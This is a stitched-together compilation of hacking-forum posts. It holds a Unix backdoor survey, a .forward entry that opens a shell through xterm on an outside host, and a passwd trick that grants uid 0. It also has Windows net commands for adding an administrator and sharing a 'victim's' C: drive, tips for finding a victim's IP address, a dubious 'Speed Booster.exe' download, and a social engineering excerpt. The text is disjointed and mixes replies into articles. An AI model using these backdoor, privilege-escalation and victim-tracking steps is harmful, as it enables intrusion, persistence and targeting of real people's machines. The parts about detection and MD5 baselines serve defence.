On networked Unix machines, services like Rsh and Rlogin used a simple

authentication method based on hostnames that appear in rhosts. A user

could easily configure which machines not to require a password to log

into. An intruder that gained access to someone's rhosts file could put a

"+ +" in the file and that would allow anyone from anywhere to log into

that account without a password. Many intruders use this method especially

when NFS is exporting home directories to the world. These accounts

become backdoors for intruders to get back into the system. Many intruders

prefer using Rsh over Rlogin because it is many times lacking any logging

capability. Many administrators check for "+ +" therefore an intruder may

actually put in a hostname and username from another compromised account on

the network, making it less obvious to spot.


Checksum and Timestamp Backdoors


Early on, many intruders replaced binaries with their own trojan versions.

Many system administrators relied on time-stamping and the system checksum

programs, e.g., Unix's sum program, to try to determine when a binary file

has been modified. Intruders have developed technology that will recreate

the same time-stamp for the trojan file as the original file. This is

accomplished by setting the system clock time back to the original file's

time and then adjusting the trojan file's time to the system clock. Once

the binary trojan file has the exact same time as the original, the system

clock is reset to the current time. The sum program relies on a CRC

checksum and is easily spoofed. Intruders have developed programs that

would modify the trojan binary to have the necessary original checksum,

thus fooling the administrators. MD5 checksums is the recommended choice

to use today by most vendors. MD5 is based on an algorithm that no one has

yet to date proven can be spoofed.


Login Backdoor


On Unix, the login program is the software that usually does the password

authentication when someone telnets to the machine. Intruders grabbed the

source code to login.c and modified it that when login compared the user's

password with the stored password, it would first check for a backdoor

password. If the user typed in the backdoor password, it would allow you to

log in regardless of what the administrator sets the passwords to. Thus

this allowed the intruder to log into any account, even root. The

password backdoor would spawn access before the user actually logged in and

appeared in utmp and wtmp. Therefore an intruder could be logged in and

have shell access without it appearing anyone is on that machine as that

account. Administrators started noticing these backdoors especially if

they did a "strings" command to find what text was in the login program.

Many times the backdoor password would show up. The intruders then

encrypted or hid the backdoor password better so it would not appear by

just doing strings. Many of the administrators can detect these backdoors

with MD5 checksums.


Telnetd Backdoor


When a user telnets to the machine, inetd service listens on the port and

receive the connection and then passes it to in.telnetd, that then runs

login. Some intruders knew the administrator was checking the login

program for tampering, so they modified in.telnetd. Within in.telnetd, it

does several checks from the user for things like what kind of terminal the

user was using. Typically, the terminal setting might be Xterm or VT100.

An intruder could backdoor it so that when the terminal was set to

"letmein", it would spawn a shell without requiring any authentication.

Intruders have backdoored some services so that any connection from a

specific source port can spawn a shell.


Services Backdoor


Almost every network service has at one time been backdoored by an

intruder. Backdoored versions of finger, rsh, rexec, rlogin, ftp, even

inetd, etc., have been floating around forever. There are programs that

are nothing more than a shell connected to a TCP port with maybe a backdoor

password to gain access. These programs sometimes replace a service like

uucp that never gets used or they get added to the inetd.conf file as a new

service. Administrators should be very wary of what services are running

and analyze the original services by MD5 checksums.


Cronjob backdoor


Cronjob on Unix schedules when certain programs should be run. An intruder

could add a backdoor shell program to run between 1 AM and 2 AM. So for 1

hour every night, the intruder could gain access. Intruders have also

looked at legitimate programs that typically run in cronjob and built

backdoors into those programs as well.


Library backdoors


Almost every UNIX system uses shared libraries. The shared libraries are

intended to reuse many of the same routines thus cutting down on the size

of programs. Some intruders have backdoored some of the routines like

crypt.c and _crypt.c. Programs like login.c would use the crypt() routine

and if a backdoor password was used it would spawn a shell. Therefore,

even if the administrator was checking the MD5 of the login program, it was

still spawning a backdoor routine and many administrators were not checking

the libraries as a possible source of backdoors.


One problem for many intruders was that some administrators started MD5

checksums of almost everything. One method intruders used to get around

that is to backdoor the open() and file access routines. The backdoor

routines were configured to read the original files, but execute the trojan

backdoors. Therefore, when the MD5 checksum program was reading these

files, the checksums always looked good. But when the system ran the

program, it executed the trojan version. Even the trojan library itself,

could be hidden from the MD5 checksums. One way to an administrator could

get around this backdoor was to statically link the MD5 checksum checker

and run on the system. The statically linked program does not use the

trojan shared libraries.


Kernel backdoors


The kernel on Unix is the core of how Unix works. The same method used for

libraries for bypassing MD5 checksum could be used at the kernel level,

except even a statically linked program could not tell the difference. A

good backdoored kernel is probably one of the hardest to find by

administrators, fortunately kernel backdoor scripts have not yet been

widely made available and no one knows how wide spread they really are.


File system backdoors


An intruder may want to store their loot or data on a server somewhere

without the administrator finding the files. The intruder's files can

typically contain their toolbox of exploit scripts, backdoors, sniffer

logs, copied data like email messages, source code, etc. To hide these

sometimes large files from an administrator, an intruder may patch the

files system commands like "ls", "du", and "fsck" to hide the existence of

certain directories or files. At a very low level, one intruder's backdoor

created a section on the hard drive to have a proprietary format that was

designated as "bad" sectors on the hard drive. Thus an intruder could

access those hidden files with only special tools, but to the regular

administrator, it is very difficult to determine that the marked "bad"

sectors were indeed storage area for the hidden file system.


Bootblock backdoors


In the PC world, many viruses have hid themselves within the bootblock

section and most antivirus software will check to see if the bootblock has

been altered. On Unix, most administrators do not have any software that

checks the bootblock, therefore some intruders have hidden some backdoors

in the bootblock area.


Process hiding backdoors


An intruder many times wants to hide the programs they are running. The

programs they want to hide are commonly a password cracker or a sniffer.

There are quite a few methods and here are some of the more common:


An intruder may write the program to modify its own argv[] to make it look

like another process name.


An intruder could rename the sniffer program to a legitimate service like

in.syslog and run it. Thus when an administrator does a "ps" or looks at

what is running, the standard service names appear.


An intruder could modify the library routines so that "ps" does not show

all the processes.


An intruder could patch a backdoor or program into an interrupt driven

routine so it does not appear in the process table. An example backdoor

using this technique is amod.tar.gz available on

http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html


An intruder could modify the kernel to hide certain processes as well.


Rootkit


One of the most popular packages to install backdoors is rootkit. It can

easily be located using Web search engines. From the Rootkit README, here

are the typical files that get installed:


z2 - removes entries from utmp, wtmp, and lastlog.

Es - rokstar's ethernet sniffer for sun4 based kernels.

Fix - try to fake checksums, install with same dates/perms/u/g.

Sl - become root via a magic password sent to login.

Ic - modified ifconfig to remove PROMISC flag from output.

ps: - hides the processes.

Ns - modified netstat to hide connections to certain machines.

Ls - hides certain directories and files from being listed.

du5 - hides how much space is being used on your hard drive.

ls5 - hides certain files and directories from being listed.


Network traffic backdoors


Not only do intruders want to hide their tracks on the machine, but also

they want to hide their network traffic as much as possible. These network

traffic backdoors sometimes allow an intruder to gain access through a

firewall. There are many network backdoor programs that allow an intruder

to set up on a certain port number on a machine that will allow access

without ever going through the normal services. Because the traffic is

going to a non-standard network port, the administrator can overlook the

intruder's traffic. These network traffic backdoors are typically using

TCP, UDP, and ICMP, but it could be many other kinds of packets.


TCP Shell Backdoors


The intruder can set up these TCP Shell backdoors on some high port number

possibly where the firewall is not blocking that TCP port. Many times,

they will be protected with a password just so that an administrator that

connects to it, will not immediately see shell access. An administrator

can look for these connections with netstat to see what ports are listening

and where current connections are going to and from. Many times, these

backdoors allow an intruder to get past TCP Wrapper technology. These

backdoors could be run on the SMTP port, which many firewalls allow traffic

to pass for e-mail.


UDP Shell Backdoors


Administrator many times can spot a TCP connection and notice the odd

behavior, while UDP shell backdoors lack any connection so netstat would

not show an intruder accessing the Unix machine. Many firewalls have been

configured to allow UDP packets for services like DNS through. Many times,

intruders will place the UDP Shell backdoor on that port and it will be

allowed to by-pass the firewall.


ICMP Shell Backdoors


Ping is one of the most common ways to find out if a machine is alive by

sending and receiving ICMP packets. Many firewalls allow outsiders to ping

internal machines. An intruder can put data in the Ping ICMP packets and

tunnel a shell between the pinging machines. An administrator may notice a

flurry of Ping packets, but unless the administrator looks at the data in

the packets, an intruder can be unnoticed.


Encrypted Link


An administrator can set up a sniffer trying to see data appears as someone

accessing a shell, but an intruder can add encryption to the Network

traffic backdoors and it becomes almost impossible to determine what is

actually being transmitted between two machines.


Windows NT


Because Windows NT does not easily allow multiple users on a single machine

and remote access similar as Unix, it becomes harder for the intruder to

break into Windows NT, install a backdoor, and launch an attack from it.

Thus you will find more frequently network attacks that are spring boarded

from a Unix box than Windows NT. As Windows NT advances in multi-user

technologies, this may give a higher frequency of intruders who use Windows

NT to their advantage. And if this does happen, many of the concepts from

Unix backdoors can be ported to Windows NT and administrators can be ready

for the intruder. Today, there are already telnet daemons available for

Windows NT. With Network Traffic backdoors, they are very feasible for

intruders to install on Windows NT.


Solutions


As backdoor technology advances, it becomes even harder for administrators

to determine if an intruder has gotten in or if they have been successfully

locked out.


Assessment


One of the first steps in being proactive is to assess how vulnerable your

network is, thus being able to figure out what holes exist that should be

fixed. Many commercial tools exist to help scan and audit the network and

systems for vulnerabilities. Many companies could dramatically improve

their security if they only installed the security patches made freely

available by their vendors.


MD5 Baselines


One necessary component of a system scanner is MD5 checksum baselines.

This MD5 baseline should be built up before a hacker attack with clean

systems. Once a hacker is in and has installed backdoors, trying to create

a baseline after the fact could incorporate the backdoors into the

baseline. Several companies had been hacked and had backdoors installed on

their systems for many months. Overtime, all the backups of the systems

contained the backdoors. When some of these companies found out they had

a hacker, they restored a backup in hopes of removing any backdoors. The

effort was futile since they were restoring all the files, even the

backdoored ones. The binary baseline comparison needs to be done before an

attack happens.


Intrusion detection


Intrusion detection is becoming more important as organizations are hooking

up and allowing connections to some of their machines. Most of the older

intrusion detection technology was log-based events. The latest intrusion

detection system (IDS) technology is based on real-time sniffing and

network traffic security analysis. Many of the network traffic backdoors

can now easily be detected. The latest IDS technology can take a look at

the DNS UDP packets and determine if it matches the DNS protocol requests.

If the data on the DNS port does not match the DNS protocol, an alert flag

can be signaled and the data captured for further analysis. The same

principle can be applied to the data in an ICMP packet to see if it is the

normal ping data or if it is carrying encrypted shell session.


Boot from CD-ROM.


Some administrators may want to consider booting from CD-ROM thus

eliminating the possibility of an intruder installing a backdoor on the

CD-ROM. The problem with this method is the cost and time of implementing

this solution enterprise wide.


Vigilant


Because the security field is changing so fast, with new vulnerabilities

being announced daily and intruders are constantly designing new attack and

backdoor techniques, no security technology is effective without vigilance.


Be aware that no defense is foolproof, and that there is no substitute for

diligent attention.


-------------------------------------------------------------------------


you may want to add:


.forward Backdoor


On Unix machines, placing commands into the .forward file was also

a common method of regaining access. For the account ``username''

a .forward file might be constructed as follows:


\username

|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"


permutations of this method include alteration of the systems mail

aliases file (most commonly located at /etc/aliases). Note that

this is a simple permutation, the more advanced can run a simple

script from the forward file that can take arbitrary commands via

stdin (after minor preprocessing).


PS: The above method is also useful gaining access a companies

mailhub (assuming there is a shared a home directory FS on

the client and server).


> Using smrsh can effectively negate this backdoor (although it's quite

> possibly still a problem if you allow things like elm's filter or

> procmail which can run programs themselves...).


---------------------------------------------------------------------------


you may want to add this "feature" that can act as a backdoor:


when specifying a wrong uid/gid in the /etc/password file,

most login(1) implementations will fail to detect the wrong

uid/gid and atoi(3) will set uid/gid to 0, giving superuser

privileges.


example:

rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh

on Linux boxes, this will give uid 0 to user rmartin.

Some useful commands in cmd :

Some useful commands in cmd :
First thing you need to know is some very helpfull commands to use on CMD(Command Prompt).

In case you don't know how to get CMD open in your box, then click on Start, then Run, then type "cmd" (no quotes, off course... you know the drill).


In case you don't know some of them, then just type the command on CMD and hit enter. A little help will show up in your screen. Read it and understand what the command does.

Lets start easy...

1) ping : This command will allow you to know if the host you pinging is alive, which means if it is up at the time of executing the "ping" command.

ping x.x.x.x (x is the IP address)

or

ping www.whatever.com (www.whatever.com is the website you want to ping, but you don't know the IP)

OBS: Keep in mind that if the host you pinging is blocking ICMP packets, then the result will be host down. Oct 11 AnUj
nslookup
2) nslookup : This command has many functionalities.
One is for resolving DNS into IP.
Lets say you know the website URL but you don't know its IP(and you want to find out).

nslookup
Code:
www.whatever.com
(www.whatever.com is the website you want to find out the IP)

Now, another really nice function of nslookup is to find out IP of specific Mail Severs.

nslookup (enter)
set type=mx (enter)
yahoo.com

This command will give you the mail server IP of yahoo.com. You can use whatever server you want and if it is listed on DNS, then you get the IP. Simple, isn't it?

OK, now why would you want to have an IP of a mail server?
To send spoofed mail to your friends or even for SE. Oct 11 AnUj
tracert
3) tracert : This command will give you the hops that a packet will travel to reach its final destination.

OBS: This command is good to know the route a packet takes before it goes to the target box.

tracert x.x.x.x (x is the IP address)

or

tracert www.whatever.com (www.whatever.com is the website you don't know the IP) Oct 11 AnUj
arp
This command will show you the arp table. This is good to know if someone is doing arp poisoning in your LAN.

arp -a Oct 11 AnUj
route
This command will show you the routing table, gateway, interface and metric.

route print Oct 11 AnUj
ipconfig
This command will show tons of very helpful things.
Your IP, gateway, dns in use.

ipconfig Oct 11 AnUj
netstat
This command will show you connection to your box.

netstat

or

netstat -a (this will show you all the listening ports and connection with DNS names)
netstat -n (this will show you all the open connection with IP addresses)
netstat -an (this will combined both of the above) Oct 11 AnUj
nbtstat
This command will show you the netbios name of the target box.

nbtstat -A x.x.x.x (x is the IP address)

nbtstat -a computername


net view x.x.x.x or computername (will list the available sharing folders on the target box)


Now some hints:

net use \ipaddressipc$ "" /user:administrator
(this command will allow you to connect to the target box as administrator)

Now if you want to connect to the target box and browse the entire C drive, then use this command:

net use K: \computernameC$ (this will create a virtual drive on your "my computer" fold Oct 11 AnUj
And least but not last, the "help" command.

whatevercommand /help

or

whatevercommand /?
Hacking via dos :

Try these following dos commands and use them for hacking


1) ping command
a cool way to say hello to victim
try
ping [victims ip goes here]
if the result is request timed out then the user is ofline
if the result is reply from [ip] bytes=32 time<1ms TTL 64
the victim is online.

2)net user [anyname] /add
it adds a new net user put any name inplace of [anyname]

3)net localgroup administrators [anyname] /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it's nice
yo know wich version of windows xp you are going to try share.

4)net share system=C:\ /unlimited
This commands share the C: drive with the name of system.
you can use any root dir. instead

5)net use \\victimip [nameofnetaccount]
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
where nameofnetuser is the name via which victim logs on

6)explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access!

SAUV : This works only for the local PC's account and it fails for the Password if u r using LAN

=====================================================================================

Getting Ip data from various sources :
Introduction
Getting the local machine's name
RAS machines using some sort of dialup
Network machines
Using the DHCP VxD to get the IP address and the DNS server data
Using WsControl() to get the IP address
Author
Legalese
Copyright


Introduction
------------

This document describes several ways to get TCP/IP specific data under
Windows 95+. Information was provided by George Foot, Jacob Verhoeks,
Arthur Hoogervorst and several whacky programs by Alfons Hoogervorst.

Basic information required to get for TCP/IP:

o The local machine's name

o The local machine's IP address(es)

o The IP addresses of DNS servers

Sample source code (in C), that demonstrate the techniques described in this
document, are available on request.

This document refers seevral times to the Windows registry and to VxDs. If
you want to use the registry and to call VxDs from within DOS programs
(running under Windows), also check out

http://www.hoogervorst.demon.nl.no.spam/proteus/files/regdos.zip (delete
the usual no.spam from the URL).
Getting the local machine's name
--------------------------------

You can get the computer's name by getting the ASCIIZ string from the
following key:

HKEY_LOCAL_MACHINE\
System\
CurrentControlSet\
Control\
ComputerName\
ComputerName\
ComputerName = ASCIIZ string of max. 64 characters.

Several Windows TCP/IP programs use the computer name in host names, for
example Eudora. However, the returned ASCIIZ string doesn't have to be
"DNS compliant", i.e. it may have white space and other characters that
are invalid in host names.

Alternatively, you can find the "real" machine name by getting the current
IP address, and using gethostbyaddr().


RAS machines using some sort of dialup
--------------------------------------

The RAS dialup adapter stores TCP/IP settings in a "phone book entry". For
Windows 95, this phone book is stored in the registry. To get the relevant
addresses, you need to follow these steps:

1. Check if there's a RAS connection active (optional):

Read DWORD value of the following key:

HKEY_LOCAL_MACHINE\
System\
CurrentControlSet\
Services\
RemoteAccess\
Remote Connection = DWORD

If the returned DWORD has value 1, there's a RAS connection


2. Get the name of the current RAS phone book:

Read an ASCIIZ string from the following key:

HKEY_CURRENT_USER\
RemoteAccess\
Default = ASCIIZ string for the active phone book

The returned string should be used in the next step.


3. Get the RAS settings using the "phone book name". Note that you should
first get the size for the settings buffer (using the Registry API).

Read binary data from the following key:

HKEY_CURRENT_USER\
RemoteAccess\
Profile\
"phone book name" = BINARY data of max. 50 bytes

"phone book name" is the name of the phone book retrieved in step 3.


4. The byte at offset 0x04 in the retrieved data buffer has several flags
set for available TCP/IP data.

If bit one (0x01) is set, the user set a fixed IP address for the
current RAS connection. This fixed IP address (in host order) can
be found at offset 0x08.

If bit two (0x02) is set, the user specified one or two DNS addresses.
The DNS addresses are in host order, and can be found at offset 0x0C
and offset 0x10. Note: 0.0.0.0 (0x0UL) is an invalid (unspecified) DNS
address.

History:

I had most of the registry functions working (for DOS programs running
under Windows 3.1 and 95), and also found the appropriate RAS connection
key. I didn't find the necessary IP data, and told this to Jacob Verhoeks.
The next day he came up with a full and detailed description of the binary
data stored under the RemoteAccess\Profile tree.


Network machines
----------------

For network machines too the data is stored in the registry. Here are the
steps to retrieve the current IP address and the DNS IP addresses.

1. The current active adapter's IP address can be found in the following key:

HKEY_LOCAL_MACHINE\
System\
CurrentControlSet\
Services\
Class\
NetTrans\
0000\
IPAddress = ASCIIZ string

This ASCIIZ string has the dotted name IP address.

Note: Presumably Windows 95 stores multiple interfaces in the NetTrans
key. Ideally you should enumerate each of them, and check whether any
of them has an "IPAddress" key.

2. The current IP addresses of DNS servers can be found in the following
key:

HKEY_LOCAL_MACHINE\
System\
CurrentControlSet\
Services\
VxD\
MSTCP\
NameServer = ASCIIZ string

This key stores DNS IP addresses in a comma-separated list.


History:

I hadn't worked for a long time on DosSock95 when George Foot referred
me to a .FIX file and sent me the info about the IP address. Both
George Foot and Jacob Verhoeks provided the key which stores the name
server information.


Using the DHCP VxD to get the IP address and the DNS server data
----------------------------------------------------------------

For RAS connections, there's an alternate way to get the IP address and
DNS server addresses. This only works with RAS connections.

First get the entry point of the DHCP VxD (which has ID 0x49A). Call the
entry point with (E)AX set to 1, ES:BX set to a buffer receiving DHCP data,
and (E)CX with the size of the buffer. If the buffer is smaller than the
data available, AX will be set to 111 (Win32 error: ERROR_BUFFER_OVERFLOW)
and the first DWORD in the buffer will contain the size of the DHCP data.

Here's how the information looks like:

Offset Type What

0x0000 WORD Number of IP addresses
0x000C DWORD IP addresses in host order
0x0020 WORD Total number of bytes in server addresses. Divide by
four to get the number of server addresses.
0x0024 WORD Offset (from begin of data) to server addresses.

History:

This information was found while stepping through the WinSock code.
Don't try this at home (in a sense: do it actually at home).


Using WsControl() to get the IP address
---------------------------------------

WsControl() is an undocumented function found in both the 16 bit and the
32 bit WinSock DLLs of Microsoft. Many people already suspected that
WsControl() returns very useful data, because it's used by the Windows 95
WINIPCFG tool. The problem is that it's an undocumented function: you won't
hear anything of it from Microsoft... In short: the following information may
be highly platform dependent, and extremely unportable. Food for the hacking
minded proper. Here's what I found out (and I'd appreciate any comments if
you find other things about WsControl).

The WsControl() function looks like this:

DWORD WsControl(DWORD Protocol, DWORD Action,
LPVOID CommandBuffer, LPDWORD CommandBufferSize,
LPVOID ResultBuffer, LPDWORD ResultBufferSize);

For TCP/IP Protocol should be set to IPPROTO_TCP and/or IPPROTO_UDP. Other
protocol values result in the expected WSA error "unsupported protocol".

The only value of Action I encountered was 0, which seems to mean something
like "Get Information". I believe that passing a value of 1 would send
something like "Set Information" to WinSock; but I must admit that I didn't
try this. (For obvious reasons ofcourse. If you happen to have a lot of
money, consider donating money to me, so I can buy a test machine. Smile

CommandBuffer has a buffer with a command that's sent to WinSock,
CommandBufferSize points to a DWORD with the size of the CommandBuffer.

On return of the function, ResultBuffer will have data returned by WsControl
for the command in CommandBuffer. The DWORD pointed to by ResultBufferSize
should have the size of ResultBuffer on function call, and has the number
of bytes written to ResultBuffer on function return.


CommandBuffer
-------------

The Command buffer is a structure of 36 bytes. It may look like this; names
are mine, yours may be better.


#pragma pack(1)
typedef struct
{
DWORD Number; /* Interface number, WS_INTERFACE_TCPIP for TCPIP */
DWORD Unknown; /* Seems to be used to differentiate between
* multiple TCPIP interfaces. */
} WS_INTERFACE, FAR* LPWS_INTERFACE, NEAR* NPWS_INTERFACE, * PWS_INTERFACE;

typedef struct
{
WS_INTERFACE Interface; /* Interfaces to query??? */

DWORD What; /* Changes for each request */
DWORD Unknown; /* Seems to be always 0x100??? */
DWORD Command; /* Obviously a command */

BYTE Unknown1[16]; /* Unknown (Always 0???) */
} WS_IN_PARAMS, FAR* LPWS_IN_PARAMS, NEAR* NPWS_IN_PARAMS, * PWS_IN_PARAMS;
#pragma pack()

The first two DWORDs in the WS_IN_PARAMS structure (the CommandBuffer) have
a number for what I call an "interface". In Windows 95 lingo you can call
it an adapter. For the TCP/IP interface, the Interface should have a value
of 0x0301, with possibly some other value for the most significant DWORD
(little endian: xxxx xxxx 0000 0301).

Just to clarify the above phrase: when Windows searches
for an TCP/IP interface, it loops while checking for the
DWORD 0x00000301.

The What member seems to change for each WsControl request, and probably
"browses" deeper into the hierarchy of data available through WsControl.

The Command member has a number which seem to correspond with a command.


Available Commands
------------------

Here's what I found about commands. Note that the naming of the commands
are mine; yours may be better.


Get List Of Interfaces
----------------------

Interface = 0
What = 0x100
Unknown = 0x100
Command = 0
Unknown1[] = 0

Returns several quad words (4 words, 2 dwords) with all the interfaces
available for use in WsControl.

The interface number for TCP/IP is 0x0301 (with the Unknown dword
possibly set to differentiate between multiple TCP/IP interfaces).

Example output:

0000: 00 04 00 00 00 00 00 00 - 01 04 00 00 00 00 00 00
0010: 01 03 00 00 00 00 00 00 - 80 03 00 00 00 00 00 00
0020: 80 02 00 00 00 00 00 00 - 00 02 00 00 00 00 00 00
0030: 00 02 00 00 01 00 00 00

The quadword at offset 0x10 has the first (and only) TCP/IP interface.
Incidently, the quadword at 0x30 is related to the loopback adapter,
the quadword at 0x28 to the PPP adapter.


Acknowledge Valid Interface (Get Version??? Is Current???)
----------------------------------------------------------

Interface = Valid Interface
What = 0x100
Unknown = 0x100
Command = 0x1
Unknown1[] = 0

To acknowledge the interface in Interface, send the above command.
The result buffer should return a DWORD with a special value.

For example, the interface number for TCP/IP is 0x0301. If you set
Interface to 0000 0000 0000 0301, the returned DWORD will contain
0x0303. Presumably, the special value returned is related to the
HIBYTE of the interface number.

Note that the ResultBufferSize will NOT have the number of bytes written
to the buffer. This seems to be a bug - or perhaps it's just the way
this command is supposed to work. Your guess may be better.

Example output:

0000: 03 03 00 00

The above output is for the TCP/IP interface.


Get Interface Information
-------------------------

Interface = Valid Interface
What = 0x200
Unknown = 0x100
Command = 0x1
Unknown1[] = 0

This command returns several data which may or may not be useful at all.

For TCP/IP the DWORD at offset 0x54 has the number of IP addresses
active for the TCP/IP interface. To get specific IP address information,
use the Get Active Address Information.

For TCP/IP the DWORD at offset 0x58 has the number of IP address related
information structures. To get the information, use the Get Extended Active
Address Information.

Example Output:

For TCP/IP:

0000: 02 00 00 00 80 00 00 00 - EA 01 00 00 00 00 00 00
0010: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
0020: EA 01 00 00 66 01 00 00 - 00 00 00 00 00 00 00 00
0030: 00 00 00 00 3C 00 00 00 - 00 00 00 00 00 00 00 00
0040: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
0050: 02 00 00 00 02 00 00 00 - 07 00 00 00

The DWORD at offset 0x54 has the number of structures returned by
the Get Active Address Information command. The DWORD at offset
0x58 has the number of structures returned by the Get Extended
Active Address command.


Get Extended Active Address Information
---------------------------------------

Interface = Valid Interface
What = 0x200
Unknown = 0x100
Command = 0x101
Unknown1[] = 0

For TCP/IP this command returns data with an unknown structure. It
seems to list network masks.

Example output:

For TCP/IP see output below. Note that the size of each structure is
0x150 / 0x07.

0000: E0 00 00 00 02 00 00 00 - 01 00 00 00 FF FF FF FF
0010: FF FF FF FF FF FF FF FF - C3 AD E4 8E 03 00 00 00
0020: 02 00 00 00 38 00 00 00 - E0 00 00 00 FF FF FF FF
0030: 00 00 00 00 02 00 00 00 - 01 00 00 00 FF FF FF FF
0040: FF FF FF FF FF FF FF FF - C3 AD E4 8E 03 00 00 00
0050: 02 00 00 00 38 00 00 00 - 00 00 00 00 FF FF FF FF
0060: C3 AD E4 8E 01 00 00 00 - 01 00 00 00 FF FF FF FF
0070: FF FF FF FF FF FF FF FF - 7F 00 00 01 03 00 00 00
0080: 02 00 00 00 38 00 00 00 - FF FF FF FF FF FF FF FF
0090: C3 AD E4 FF 02 00 00 00 - 01 00 00 00 FF FF FF FF
00A0: FF FF FF FF FF FF FF FF - C3 AD E4 8E 03 00 00 00
00B0: 02 00 00 00 38 00 00 00 - FF FF FF FF FF FF FF FF
00C0: C3 AD E4 00 02 00 00 00 - 01 00 00 00 FF FF FF FF
00D0: FF FF FF FF FF FF FF FF - C3 AD E4 8E 03 00 00 00
00E0: 02 00 00 00 38 00 00 00 - FF FF FF 00 FF FF FF FF
00F0: FF FF FF FF 02 00 00 00 - 01 00 00 00 FF FF FF FF
0100: FF FF FF FF FF FF FF FF - C3 AD E4 8E 03 00 00 00
0110: 02 00 00 00 BB 2B 00 00 - FF FF FF FF FF FF FF FF
0120: 7F 00 00 00 01 00 00 00 - 01 00 00 00 FF FF FF FF
0130: FF FF FF FF FF FF FF FF - 7F 00 00 01 03 00 00 00
0140: 02 00 00 00 BC 2B 00 00 - FF 00 00 00 FF FF FF FF


Get Active Address Information
------------------------------

Interface = Valid Interface
What = 0x200
Unknown = 0x100
Command = 0x102
Unknown1[] = 0

For TCP/IP this command returns data which is partly understood. The
first four bytes in each structure have active IP addresses.

Example output:

For TCP/IP see output below. Note that the size of each structure is
0x30 / 0x02.

0000: C3 AD E4 8E 02 00 00 00 - FF FF FF 00 01 00 00 00
0010: FF FF 00 00 01 00 00 C0 - 7F 00 00 01 01 00 00 00
0020: FF 00 00 00 01 00 00 00 - FF FF 00 00 00 00 00 C0

As you can see, the first DWORD has the current IP address
(195.173.228.142). The first DWORD in the second structure has the
loopback address of 127.0.0.1, which was active at that time.


Author
------

Written by Alfons Hoogervorst. He can be contacted at
.

If you have additional information about any of the topics in this document,
especially about WsControl(), send me a note. Comments, suggestions, and
any useful hints are welcome too.

Alfons works as a freelance developer, specializing in low-level programming.


Legalese
--------

You're allowed to distribute this file for free, without paying me any fee.
However, the following sections should remain unmodified in this document:

Introduction, Author, Legalese, Copyright.

The information in this document is provided AS IS, without any warranties
or guarantees. As a human being, he expressedly reserves his rights to err:
"If its meaning doesn't manifest, then: put it to rest!"

SAUV :hmm......Nice
check the yahoo exploits if u wanna hack emails using chatting and Ips

Ethics Of Hacking :

Ethics Of Hacking :
I M Shocked That This Forum Is Here.......Its Known That anyone joining this website...should b a hacker and should have a basic knowledge of hackinf......but still for the intermediates and beginners........
Hacking Can B Done In Millions Of Ways......Phishing,Bruteforcer,Keylogger and wat not all......
Do You Know that there r millions of ways of defacing a website......but the must of all this is that you should have a fast internet connection of minimum 10mbps......
I know in India legally its not possible but Twisted Evil illegaly it is Evil or Very Mad
the best way to achieve is to use some speed enhancers......i ve uploaded a speed enhancer here.........just download it and....make ur computer/server run twice its original speed......

Speed Booster.exe
Description:
This Is A Kool Speed Booster......With Any Basic Speed That U Have It Will Enhance it to 10 mb/s (10 mbps)

Download
Filename: Speed Booster.exe
Filesize: 44.01 KB
Downloaded: 824 Time(s)

SAUV :dude its not instaling...error msg is"speed booster.exe is not a valid win32 application...
wat to do now???

hey bro......This Speed Booster Has Been Specially Designed For A limited IP addresses..These Ip address includes of all d active members oof this community......Most of d softwares available here functions on d same rule.....

a group called as Czar Hackerz Just b a pat of this and fill up d forums.........
We r ready to help you........
As Soon as you send 10 new posts in any forum v shall include ur IP address.............

How To Get Ip Address Of Victom PC :

How To Get Ip Address Of Victom PC :

Find an msn messengers contact IP address

The only way i know to do that is to send to the contact a file while he is online , send him/her a photo or something else , doing that a peer-to-peer connection opens while your friend gets the file/photo no matter what it is , make sure that you have a DOS Prompt open (located at:start > programs > MS-DOS Prompt) and type the command: netstat while sending them the file and you will see a list in the DOS Prompt of all the connections your computer has that time , one of them must be your friend that is receiving the file.If i hear about an other easier way that you get it without sending files be sure i will post it here.

Find an IP though mIRC chat channels

There is the /dns nickname command in irc but some people use proxies or shells and you cant see their real address,how do you know if the user uses a web-shell or a proxy? well... guess that yourself while looking the ip you got from the /dns nickname command , make sure you check out IRC Scanner v1.0 by RG in our programming section and in IP scanners section , its the best and fastest way to scan the users in IRC channels.

Get your friends IP address by sending them to your page

Build a simple site in geocities or anywhere else , then go t http://www.stats4all.com and create an account , they provide free website statistics , add their code to your site and tell your friend to check out a cool page you just made , when he visits the page his IP will be logged in stats4all.com so after your friend visits your page check out your stats in stats4all.com and you will find the last 5 visitors at the left of the stats page , your friends IP included.

sauv :Well even netstat commands can b usig if u r chatting wd him
2.but a person uses the dynamic ip address....ie
his ip address will be changed by his ISP next time he will online.

tht means i have to track his ip address all the time when he comes online???
3.u use netstat -n
4.wid da netstat -n command vl v get his ISP ??...i mean da permanent one...

---------------------------------------------

Social Engineering :

Social Engineering :

source :- http://www.securityfocus.com/infocus/1860

The purpose of this article is to go beyond the basics and explore how social engineering, employed as technology, has evolved over the past few years. A case study of a typical Fortune 1000 company will be discussed, putting emphasis on the importance of education about social engineering for every corporate security program.
Top five hacking moments on film
To break the ice, let's start this article by looking at this author's top five favorite hacking moments in modern movies, all of them quite old-school to emphasize a point:

5. Independence Day: Using an old space ship as cover for two humans to infiltrate the alien mother ship and upload a virus to destroy it.
4. Hackers: Dumpster diving in the target company's trash in order to obtain financial data from printouts.
3. War Games: Password cracking the military computer system by studying its creator.
2. Ferris Bueller's Day Off: Faking a grandmother's death to get Ferris's girlfriend excused from school through multiple phone calls and answering machine recordings.
1. Star Wars: R2-D2 gaining access to the death star main computer and shutting down the garbage dispensers (remember the com link!).

Question: Which of the above hacks did not employ a social engineering technique? Answer: None of the above.

